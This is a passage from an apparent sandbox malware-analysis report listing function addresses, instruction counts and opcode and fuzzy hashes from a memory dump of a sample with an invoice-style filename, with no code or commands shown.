                                            • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                            • Instruction ID: 4b116f53988232bd02d21555b4e5f2543656798012a81436531a613d9ae46a42
                                            • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                            • Instruction Fuzzy Hash: 0D01F932600A89EBD323975DCC49F59FB98EF52B54F0940A9FA48DB6A1D674CA80C251
                                            Function 018661E5 Relevance: .0, Instructions: 41COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8379221d6d3d05c79ee7f2d0225fd4d06b65db3c7277096e1e1fca4e8b309938
                                            • Instruction ID: 7f81c39282cebbe85e9722d01010e1fb8c17d334099f55fd5599604baa861502
                                            • Opcode Fuzzy Hash: 8379221d6d3d05c79ee7f2d0225fd4d06b65db3c7277096e1e1fca4e8b309938
                                            • Instruction Fuzzy Hash: A1012C71A0024D9BDB04DFA9D445AAEBBF8AF58314F14405AE505E7390E774AA01CB95
                                            Function 018163C0 Relevance: .0, Instructions: 41COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                            • Instruction ID: 26f4e957b4637aff917b692d549a2fcd1ff4ee081be55779a5ab90610c41ffe9
                                            • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                            • Instruction Fuzzy Hash: 79F0F97220001DBFEF019F94DD80DAFBB7EFB59298B104125BA11A2160D671DE21ABA0
                                            Function 0181A4B0 Relevance: .0, Instructions: 40COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dbd668b1534f52bfd6a604ece3572adaa25e3caebab44a33ec31bd52440b725f
                                            • Instruction ID: ee042a61eab4e241fe0c907e643e3d23abb125331285aa79f9cb16e7f5537b29
                                            • Opcode Fuzzy Hash: dbd668b1534f52bfd6a604ece3572adaa25e3caebab44a33ec31bd52440b725f
                                            • Instruction Fuzzy Hash: 00018936105149EBCF129E88D840EDE7F6AFB4C754F058102FE19A6224C336DA70EF81
                                            Function 0178C0F0 Relevance: .0, Instructions: 39COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 36ab3f2414f1e321b583fc676309d2b81d8375db3666369a3bffb7f9c8330b29
                                            • Instruction ID: 2c3caf2b4065f82d39193e3612a80ee2461926c8a44944a1151cf0ad1ec365ec
                                            • Opcode Fuzzy Hash: 36ab3f2414f1e321b583fc676309d2b81d8375db3666369a3bffb7f9c8330b29
                                            • Instruction Fuzzy Hash: 20F02BB1A842415BF716B5199C41BA2F29AE7D4794F2580BAEB058B6C2E970DC0183B4
                                            Function 017C656A Relevance: .0, Instructions: 39COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 68f246f08d9ee218261fccd9b87abf6916136c7005d73b0e82e8cced420279d2
                                            • Instruction ID: 6442749ff1d223e11a369b238cf07879e82bae28542bf51b33f12590b308ab64
                                            • Opcode Fuzzy Hash: 68f246f08d9ee218261fccd9b87abf6916136c7005d73b0e82e8cced420279d2
                                            • Instruction Fuzzy Hash: 3401A970240685DBE3339B6CDD48F25B7A4BB54F04F650198BA01DB6DAE768D5418610
                                            Function 0183437C Relevance: .0, Instructions: 37COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                            • Instruction ID: 3a9eb055e0dd2ad5a5d43292500576f01153c9dd805e4feaad5852fe22b6b4b1
                                            • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                            • Instruction Fuzzy Hash: 62F0E231385E1347EB36AA2E8820F2BEA95AFE0F40B0D062C9601CB684DF60DD0087C0
                                            Function 0181C89D Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e1fd5874c1d17f6cf870a098d631191ec6aa84708e04d8293f866e452aab7db7
                                            • Instruction ID: f606a1ee1ec4ffaaa444ef729f6ca27ae812b91b8072abd44d87744fa132aca5
                                            • Opcode Fuzzy Hash: e1fd5874c1d17f6cf870a098d631191ec6aa84708e04d8293f866e452aab7db7
                                            • Instruction Fuzzy Hash: 14F0AF716153089FC310EF68C445E1AF7E4FF98714F40465ABC98DB398E634EA00CB96
                                            Function 0181E872 Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                            • Instruction ID: 257201303bfdbf33c13fa5cff2637478325bcc9c4ff042946d4d9763f1d11070
                                            • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                            • Instruction Fuzzy Hash: 5EF09033A105119BD3328B4DCC80F12B76DABD5B60F590124AE04DB268C260ED018790
                                            Function 017C0854 Relevance: .0, Instructions: 35COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                            • Instruction ID: 59d57e4e51d38ac5cc567f5703923cda73c7076f294004c0b101122d2ea06d58
                                            • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                            • Instruction Fuzzy Hash: 25F09072650204EEE714DB25CC05F57B6E9EF98740F14C06CA645D7164FAB0DD11D694
                                            Function 0181C912 Relevance: .0, Instructions: 34COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b82b49f8a5cac7c3c0d2ffd5b7755ffa4b9ce3894e8de9a97ba0a391bd806b24
                                            • Instruction ID: c279135f372c97a15473cbe56fdaf3740f24e5b55f0e64bf8f324cad3c4fde37
                                            • Opcode Fuzzy Hash: b82b49f8a5cac7c3c0d2ffd5b7755ffa4b9ce3894e8de9a97ba0a391bd806b24
                                            • Instruction Fuzzy Hash: 86F04F71A0124DDFCB04EFA9C515A6EB7B5EF58304F008066A956EB399DA38EB01CB94
                                            Function 017947FB Relevance: .0, Instructions: 33COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f04f332223fc5024518d5d1861c30630202ed047b96f6b5fdc52632af5cbccb5
                                            • Instruction ID: 19efc13ac017791c7e980b02065cb6ef44996bf834755995362f3d0794a0410b
                                            • Opcode Fuzzy Hash: f04f332223fc5024518d5d1861c30630202ed047b96f6b5fdc52632af5cbccb5
                                            • Instruction Fuzzy Hash: 74F0B4319966D19FEF32CB5CE644F21FBD89B00630F084DAAD54B8F502D724D88AC651
                                            Function 01850115 Relevance: .0, Instructions: 32COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0de788dfc4a7c8472e8eefe1527c546e14587b7b918def12e84a99b631414f00
                                            • Instruction ID: 6b0f97440accd6a91ea67f2e965302de4e1a51b545b7866dfc7561a7f6ff2971
                                            • Opcode Fuzzy Hash: 0de788dfc4a7c8472e8eefe1527c546e14587b7b918def12e84a99b631414f00
                                            • Instruction Fuzzy Hash: 05F02726455AC447CB726B2C68503D53B54E752314F2A1089DCA0DB206E9749B87C766
                                            Function 017CC5ED Relevance: .0, Instructions: 31COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cdfb86d82dbbced3bc3f701d78d804a956df955ff57abe58e8d3e25b66206163
                                            • Instruction ID: bf0bd5fa86e96be689060c1e880ecb17bf4facc9bca016fe09301b6154c45cb3
                                            • Opcode Fuzzy Hash: cdfb86d82dbbced3bc3f701d78d804a956df955ff57abe58e8d3e25b66206163
                                            • Instruction Fuzzy Hash: 32F0E2725156519FE323972CC348B11FBD89B40FB0F0C956DD40ED7512C260E880CA51
                                            Function 017D2619 Relevance: .0, Instructions: 31COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                            • Instruction ID: 6a7232680b4fef033e2c2cd97e0eef22d9dba1a31a20501c8ee63ef774905334
                                            • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                            • Instruction Fuzzy Hash: 8CE0D8323006012BE7119E598CC4F47B77EDFD6B10F044079B6045F256C9E2DC0986A4
                                            Function 01826030 Relevance: .0, Instructions: 29COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                            • Instruction ID: 3ba855ca51e4a96ceacab52680e7e3cf064fd121b737f215b26d904c9490969f
                                            • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                            • Instruction Fuzzy Hash: 33F0A072104214AFE3228F09D844F52B7F8EB15368F61C025EA08EB160E33DEC80DFA4
                                            Function 01790710 Relevance: .0, Instructions: 28COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                            • Instruction ID: 0d08abc6a596701d922638f3484acdb4f58e4ee5c20a228b098d193eaa88e853
                                            • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                            • Instruction Fuzzy Hash: BEF0ED3A204345DBEF1ACF19E040AA9FBE8FB45360F040494FC428B311EB31EA82CB91
                                            Function 017C49D0 Relevance: .0, Instructions: 28COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                            • Instruction ID: 42bfcad9d4542397f5516db803cc628f100b718dca32b25564b747ed8ef0637f
                                            • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                            • Instruction Fuzzy Hash: 81E0D832244145ABD3211A6D8818B6EF7A5EBD4FA0F15042DE2038B150DB70DD40C7D8
                                            Function 01864164 Relevance: .0, Instructions: 27COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4c36211c14700f311aa1c78189f0fe67d065caffc67ec8c36474c277a0e0ac5f
                                            • Instruction ID: 88c30b24d3a0c97c73773da17c9722b5db88532e6745faa26058970ef749371a
                                            • Opcode Fuzzy Hash: 4c36211c14700f311aa1c78189f0fe67d065caffc67ec8c36474c277a0e0ac5f
                                            • Instruction Fuzzy Hash: 41F09B31A25E95CFE772D72CE544F5977ECAF50730F5A15A4D405C7912C724DD80C690
                                            Function 0183678E Relevance: .0, Instructions: 27COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                            • Instruction ID: 153fbed76c0c465ee9450b4523a88516d7258185cb3def36ec078fb77e84c7ac
                                            • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                            • Instruction Fuzzy Hash: 88E0DF32A00110BBDB22A7998D05F9ABEACDB94FA0F590158B702EB094E530DF00C6E0
                                            Function 018608C0 Relevance: .0, Instructions: 25COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                            • Instruction ID: 6d2a995c32ba3257ca6eb2b73f62f9dd74af5f3a335de8f186aac82dc1aa1e6e
                                            • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                            • Instruction Fuzzy Hash: 7AE09B316403548BCB25CA1EC540A73B7ECDFD57A4F158069E90587712C271F942C6D5
                                            Function 017925E0 Relevance: .0, Instructions: 23COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 957d1808f8704d89d2866d10c09ef903acb7bc96644b7ce8de901e879baa405b
                                            • Instruction ID: d2f468cbcbf79975570a6bb83cb64625caafd45cd86c01fea314399cc927f5ee
                                            • Opcode Fuzzy Hash: 957d1808f8704d89d2866d10c09ef903acb7bc96644b7ce8de901e879baa405b
                                            • Instruction Fuzzy Hash: 8EE09232100594ABC721FF29DD05F8AB7AAEFA1364F114515B15557595CB30AD11C7C8
                                            Function 0184A456 Relevance: .0, Instructions: 23COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                            • Instruction ID: fbb98f444c767995f20af2e1424a466eb4d73bea915fe2462f0fcad26e95ebd1
                                            • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                            • Instruction Fuzzy Hash: DEE09231050611DFE7366F2ADC8CB96FAE5BF60711F148C2CA09B165B4CBB499C1CA40
                                            Function 01814000 Relevance: .0, Instructions: 22COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                            • Instruction ID: 745dea4b2033114c5c7174786ccc6cd92d735f5554424758f2dbfc5cd7db5d90
                                            • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                            • Instruction Fuzzy Hash: 8DE0C2353003058FE755CF1AC050B627BBABFD5B10F28C068A9488F209EB32E982CB40
                                            Function 017CCA38 Relevance: .0, Instructions: 22COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0b8ce7dbf2b00392c951d26b12c7f9e83d5a2ea0e24b268c84009084a3a98627
                                            • Instruction ID: e0c5361ea21586f0483fe7bd9de0585effc3afa24c44ed3e173c68b49afb7be8
                                            • Opcode Fuzzy Hash: 0b8ce7dbf2b00392c951d26b12c7f9e83d5a2ea0e24b268c84009084a3a98627
                                            • Instruction Fuzzy Hash: C5D02B324858206ACB3BE11CBC0CFEBBB599B84B20F014868F20CD2015D614CD8186C4
                                            Function 0178823B Relevance: .0, Instructions: 21COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                            • Instruction ID: 2943491458c3ce3c80fdaccff34136e97c2935119da36965cfea47d0aff8b88a
                                            • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                            • Instruction Fuzzy Hash: 06E0C231488A24EFDB323F15DC08F51FAF1FF98B10F644969E0810A0A987B0AC82CB49
                                            Function 01792050 Relevance: .0, Instructions: 20COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b4f4c6a0c4ea28ae3d968ea3e78acf1ff45106059a35a14eae03cf0932ecf27f
                                            • Instruction ID: d6d03102844a81092ffa54c9402c60388f13f3141259f6d6cdc70eb2573720ea
                                            • Opcode Fuzzy Hash: b4f4c6a0c4ea28ae3d968ea3e78acf1ff45106059a35a14eae03cf0932ecf27f
                                            • Instruction Fuzzy Hash: 19E08C321004906BC711FA5DED01E4AB3AAEFA5260F100221B15187698CA20AD01C794
                                            Function 017C8A90 Relevance: .0, Instructions: 20COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                            • Instruction ID: eafe0aeefec22d2fbd32cead2ead6df76d53ecdb8a65f9d909df5287c475bd1e
                                            • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                            • Instruction Fuzzy Hash: 8FE08633111A1487C728DE1CD511B76B7A4FF45B20F09463EA61347790C534E944C795
                                            Function 017E6AA4 Relevance: .0, Instructions: 17COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                            • Instruction ID: 19c48102411ad2973ab3c349e9b991eeeac9ab213f1b7d7351844f52634ae100
                                            • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                            • Instruction Fuzzy Hash: DED05E36911A50AFC3329F1BEE04C13FBF9FBD8A107050A2EA54583A24C670A806CBA0
                                            Function 017CE59C Relevance: .0, Instructions: 16COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                            • Instruction ID: f7e4799bbd16a39c3dbb27bf99d45245844390383b61f23b97770d49d62d95b6
                                            • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                            • Instruction Fuzzy Hash: 84D0A933A04620AFD772AA1CFC04FC3B3E9BB88720F060859F028C70A1C360AC81CA84
                                            Function 0180E908 Relevance: .0, Instructions: 16COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                            • Instruction ID: 985fd5d6a4722d43d537657d980ed398eff7355275499385a52f6e7bdd7aac8c
                                            • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                            • Instruction Fuzzy Hash: 25E0EC35950684AFDF53DFA9DA44F5AFBB5BB94B40F150458A1089B6A4C624A900CB40
                                            Function 0178A0E3 Relevance: .0, Instructions: 15COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                            • Instruction ID: 1b98a578e3eefacef5a4b2fc5ee7ce181fadd77ac4e4c2bc1fd795c2474315d9
                                            • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                            • Instruction Fuzzy Hash: E5D02232612031A7CB286A556C04F63F916ABC0A90F1A006E340A93840C0048C43C2E0
                                            Function 017CA830 Relevance: .0, Instructions: 14COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
